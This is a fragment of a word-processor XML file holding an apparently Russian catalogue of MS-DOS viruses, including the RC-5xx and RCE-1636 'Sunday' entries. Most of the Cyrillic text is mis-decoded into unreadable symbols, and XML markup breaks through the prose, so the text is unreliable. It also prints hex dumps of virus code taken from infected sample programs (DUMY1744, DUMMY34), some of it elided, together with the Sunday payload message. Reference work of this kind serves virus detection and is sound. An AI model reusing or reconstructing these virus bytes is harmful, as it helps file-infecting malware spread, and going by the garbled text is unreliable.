        <w:t>07F0   B8 C5 00 50 CB FC 06 2E 8C 06 31 00 2E 8C 06 39  ...P......1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0   00 2E 8C 06 3D 00 2E 8C 06 41 00 8C C0 05 10 00  ....=....A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0   B4 30 CD 21 3D 03 1E 74 09 BA FC 01 B4 09 CD 21  .0.!=..t....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0   CD 20 C6 06 E5 01 19 B4 0F CD 10 88 26 E6 01 BA  . ..........&amp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0   17 02 B4 09 CD 21 33 DB B4 45 CD 21 8B E8 B4 3E  .....!3..E.!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0   CD 21 BB 02 00 B4 45 CD 21 FC BA 1A 02 B9 00 10  .!....E.!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0   8B DD B4 3F CD 21 0B C0 75 02 CD 20 8B C8 8B F2  ...?.!..u..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0   AC 3C 1A 74 F5 3C 0D 75 07 C6 06 E8 01 01 EB 4C  .&lt;.t.&lt;.u.......L</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0870   3C 0A 75 06 FE 06 E7 01 EB 42 3C 08 75 0D 80 3E  &lt;.u......B&lt;.u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0   E8 01 01 74 37 FE 0E E8 01 EB 31 3C 09 75 12 8A  ...t7.....1&lt;.u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0   26 E8 01 80 C4 07 80 E4 F8 FE C4 88 26 E8 01 EB  &amp;...........&amp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A0   1B 3C 07 74 17 FE 06 E8 01 8A 26 E8 01 3A 26 E6  .&lt;.t......&amp;..:&amp;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B0   01 76 09 FE 06 E7 01 C6 06 E8 01 01 8A D0 B4 02  .v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C0   CD 21 8A 26 E7 01 3A 26 E5 01 72 20 BA F0 01 B4  .!.&amp;..:&amp;..r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D0   09 CD 21 B4 0C B0 01 CD 21 BA 17 02 B4 09 CD 21  ..!.....!...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>08E0   C6 06 E8 01 01 C6 06 E7 01 01 4E 41 49 74 03 E9  ..........NA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F0   6E FF E9 54 FF 18 50 01 01 00 00 00 00 00 00 00  n..T..P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0   0D 2D 2D 20 4D 6F 72 65 20 2D 2D 24 4D 4F 52 45  .-- More --$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0   3A 20 49 6E 63 6F 72 72 65 63 74 20 44 4F 53 20  : Incorrec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0920   76 65 72 73 69 6F 6E 0D 0A 24 4D 73 44 6F 73     version..$Ms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ਬ�� ����� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뤠������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ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��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ਢ������ ���� ���� ����� १����⭠�  ����  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��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ப� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">(1CD0) ⠡���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������� �ணࠬ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. �� �����, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪠�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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">"bytes",  �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥����� ����⢨⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>墠�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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥������ ����⢨⥫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    Program   Parent   Sg   Bytes           Hooke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  ��������  ��  ������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9A6)  DOS       N/A        2    3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(1A8E)  E1840     DOS        2   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AE0)  RELEASE   DOS        2    3552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(1BC0)  GRAPHICS  DOS        2    1088 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1C06)  QUICK     DOS        2     544  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1C2A)  KBMNA     DOS        2     512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1C4C)  DOSEDIT   DOS        2   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(1CD0)  N/A       DOS        1    1824  08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2. ����� RC-5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ࠦ��� ⮫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쪮 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砥� ⨯� ⮫쪮 �� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, 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祣� ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ��ᯮᮡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">묨 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE-�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騥  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">७��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⠥��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">墠�뢠� ���뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>21.  ������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।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७</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢���� ����� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樮���� ��⥬�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ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���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஥ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢�� � Environment ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᨨ �� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3.0. ��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砫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>९��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஥ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� � ����� 䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭮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⢮���� �� �����  R�E-1813 � ���  ᫥��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᬠ�ਢ��� ���  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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E-18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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� 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㦥�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��-��������,  � ������</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࠤ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ����� �� �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�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ࠣ���� ����� �ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DUMY1744, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ����ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RC-5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: B8 15 CA 8B 36 1B 01 BF  00 01 8B 0E 1D 01 8B 1E   ....6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: 19 01 CD 21 FF 36 1F 01  C3 01 01 D0 07 11 02 47   ...!.6.........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: 01 79 00 C0 01 04 00 C4  01 4D 00 11 02 EA 00 FB   .y.......M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0: 02 01 00 FC 02 01 00 00  00 80 00 0E 25 5C 00 0E   ............%\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: 25 6C 00 0E 25 CA 01 A1  1D 01 05 14 01 90 A3 05   %l..%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0: 03 03 06 1D 01 05 00 01  A3 0D 03 8B E0 05 0F 0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0: B1 04 D3 E8 A3 0F 03 06  B8 21 35 CD 21 8C 06 FF   .........!5.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 02 89 1E FD 02 07 8B 16  27 01 B8 21 25 CD 21 8B   ........'..!%.!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0: 1E 0F 03 B4 4A CD 21 8C  C0 A3 3B 01 A3 3F 01 A3   ....J.!...;..?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0: 43 01 8E 1E 2C 00 33 F6  AC 0A 04 75 FB 83 C6 03   C...,.3....u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0: 8B D6 BB 37 01 B8 00 4B  CD 21 8C C8 8E D0 2E 8B   ...7...K.!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B0: 26 0D 03 B4 4D CD 21 2E  8B 16 0F 03 B4 31 CD 21   &amp;...M.!......1.!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0: B4 4C CD 21 2E FF 36 45  01 C3 3D 15 CA 75 19 2E   .L.!..6E..=..u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0: 3B 1E 19 01 76 08 2E C7  06 45 01 0C 02 CF F3 A4   ;...v....E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0: 58 B8 00 01 50 33 C0 CF  3D 00 4B 75 1F 06 1E 07   X...P3..=.Ku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F0: 8B FA B9 FF FF F2 AE 26  8A 45 FE 0C 20 3C 6D 07   .......&amp;.E.. &lt;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: 75 05 E8 0C 00 EB 03 E8  F1 00 32 C0 2E FF 2E FD   u.........2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: 02 06 50 53 1E 52 8B EC  0E 1F B8 24 35 CD 21 8C   ..PS.R.....$5.!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0: 06 03 03 89 1E 01 03 BA  F8 02 B8 24 25 CD 21 1E   ...........$%.!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0: 8B 56 00 8E 5E 02 B8 00  43 CD 21 72 50 2E 89 0E   .V..^...C.!r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0: 0B 03 B8 01 43 33 C9 CD  21 72 42 B8 02 3D CD 21   ....C3..!rB..=.!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0: 72 74 1F 8B D8 B8 00 57  CD 21 72 6A 89 0E 07 03   rt.....W.!rj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0: 89 16 09 03 8B 16 05 03  8B 0E 1D 01 B4 3F CD 21   .............?.!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0: 72 54 3B C1 75 50 0E 07  BF 00 01 8B F2 B9 19 00   rT;.uP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0: F3 A6 74 42 B8 02 42 33  C9 8B D1 CD 21 72 37 0B   ..tB..B3....!r7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0: D2 75 33 05 00 01 A3 1B  01 3D 00 F0 77 28 3D D0   .u3......=..w(=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0: 07 72 23 8B 0E 1D 01 8B  16 05 03 B4 40 CD 21 72   .r#.........@.!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0: 15 B8 00 42 33 D2 8B CA  CD 21 72 0A FE C6 8B 0E   ...B3....!r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C0: 1D 01 B4 40 CD 21 B8 01  57 8B 0E 07 03 8B 16 09   ...@.!..W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D0: 03 CD 21 B4 3E CD 21 B8  01 43 8B 0E 0B 03 8E 5E   ..!.&gt;.!..C.....^</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>01E0: 02 8B 56 00 CD 21 2E C5  16 01 03 B8 24 25 CD 21   ..V..!......$%.!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0: 8B E5 5A 1F 5B 58 07 C3  B0 03 CF C3 C3 5C 06 FD   ..Z.[X.......\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: 18 56 05 9D 10 25 03 36  00 21 00 20 00 36 06 64   .V...%.6.!. .6.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0: 00 90 90 90 90 90 90 90  90 90 90 90 90 90 90 9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0: 90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 9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᫥���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騥 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ப� ������� �।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E0: 90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3. ����� RCE-1636 (Sunday - ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥭ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⠬� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稫 �������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Sunday - ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥭ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��᪮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⮬ ���� ������ ����� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㤠��� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᪠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R��-1636  ����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">१������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ⠪ � ���-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ����� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஢���� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS DOS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ன �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭪樮�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  ������ ��-��������,  �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ��ᯮᮡ�� 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稭�� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2.0.</w:t>
        <w:tab/>
        <w:t>��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM, ⠪ � EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� �� ����㧪� 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  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">믮������  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>21-4Bh),  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭�� �� ���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 ���⮬� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㭨�⮦��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ����� ������ ��᫥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ॢ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>64K. ����� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COMMAND.COM. ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>墠�뢠�� ���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⨯� ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� ����� ����ᮬ ������⭮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� �⮬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ᮧ����� �� �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, � ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㢥��稢����� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1636 ���⮢.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�� �ணࠬ�� ⥫� ����� ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>頥��� � ��砫� 䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">.  �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᬥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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h   ��   ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫�   ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ������   </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ������  ⥪�⮢�� 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,  � � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᬥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">饭��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">351h - ⥪�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭�� �뤠�������  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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࠭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day is SunDay! Why do you work so h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work and no play make you a dull b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e on ! Let's go out and have some fun!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������ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥭ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>! ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祬 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠡ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠪ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">殮���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>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ﭭ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>�� ࠡ�� ��� ��� ������ ��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㤮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諨 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>! ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">멤�� �� ���� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祬�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ������ ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� �����뢠���� ��⨡��⮢�� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(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� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮤ�ন� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"",  ������ �������� �⠬�� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㣨�  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�ঠ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ������ ����ᮬ � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ਧ���� ��ࠦ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� ������⭮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஫� ��ࠦ������ �� ⮬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⨡��⮢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 �� ���� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(�.  ����).  ��� ����� �� �⮩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��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㧪� � ������ ����� ���墠�뢠�� ���뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>08  �  21. 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⮣�  ���  ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">R��-1636 �⠫ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� ��⠥��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ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᪠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祭��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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믮������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� �ணࠬ�� ����� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 �����  � ����� ��������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>筮 ⮬� ��� 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E-18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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥   㪠�뢠����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �����   �����  �����   �⠤��  ��⮭�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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㯠����  �  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥭ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �  ��� ���� �����  �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ��� ᮡ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᪠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  � ����   </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㤠���  ��  �   ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.   �����  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�⪥   ��������  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��     ��     �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">믮������  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DOS   �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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  �   ⮬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩� �� ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">.  � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">१����  ����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭨�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䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ����� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮��⥫� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠥���  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠��  ������  ���᭨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ந�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室��  � ����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।�������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭥����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �᫮���� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뤠�� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ᯫ�� �ਢ������� ��� ᮮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �� ������ �.�.�����᪮�� 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 � �⮬ ���� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�ন� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>訡�� � ������ ��⪠ ��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ଠ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⥪�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SCAN ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠�� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬� "Sunday Virus [Sunday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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �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R�E-1636 ����� � ���� 1988 - ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">砫� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1989 ����  �  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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㦥�  �  ����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1990  �  ������</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࠤ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>� � �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᨨ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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DSTEST, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稭�� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">५� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1990 �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦨���� � 㭨�⮦��� ��� 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ࠣ���� ����� �ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DUMMY34, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ����ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Sun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:  e9 92 00 01 31 c8 f7 e1 ee e7 00 01 f5 1e 00 00    "....1......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:  00 22 00 aa 00 df 0f 60 02 fd 12 56 05 c6 10 90    ".".....`...V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:  7e 00 00 00 00 00 00 00 00 00 00 00 00 00 45 06    "~.............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0:  10 e0 2b 80 00 00 00 80 00 e0 2b 5c 00 e0 2b 6c    "..+.......+\..+l"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:  00 e0 1b 80 00 6c 3e 12 00 d3 39 00 f0 06 00 4d    ".....l&gt;...9....M"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0:  5a c4 01 75 00 00 00 20 00 39 06 ff ff 16 0e 5d    "Z..u... .9.....]"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0:  06 84 19 c4 00 16 0e 1e 00 00 00 90 90 90 cd 20    "..............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  05 00 20 00 88 14 a5 79 00 02 10 00 60 e3 00 00    ".. ....y....`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0:  b9 41 2a 9b 43 4f 4d 4d 41 4e 44 2e 43 4f 4d 01    ".A*.COMMAND.C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0:  00 00 00 00 00 fc b4 ff cd 21 80 fc ff 73 15 80    ".........!...s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0:  fc 04 72 10 b4 dd bf 00 01 be 5f 06 03 f7 2e 8b    "..r......._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00b0:  4d 11 cd 21 8c c8 05 10 00 8e d0 bc 5d 06 50 b8    "M..!........].P."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0:  c4 00 50 cb fc 06 2e 8c 06 31 00 2e 8c 06 39 00    "..P......1....9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  ...   ...   ...    ...   ...    ...   ...    ...   ...    ...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40:  1f 00 90 7e 5e 5b 58 2e ff 0e 1f 00 2e ff 2e 13    "...~^[X....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0:  00 54 6f 64 61 79 20 69 73 20 53 75 6e 44 61 79    ".Today is Sun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0:  21 20 57 68 79 20 64 6f 20 79 6f 75 20 77 6f 72    "! Why do you w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0:  6b 20 73 6f 20 68 61 72 64 3f 0a 0d 41 6c 6c 20    "k so hard?..All "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0:  20 77 6f 72 6b 20 61 6e 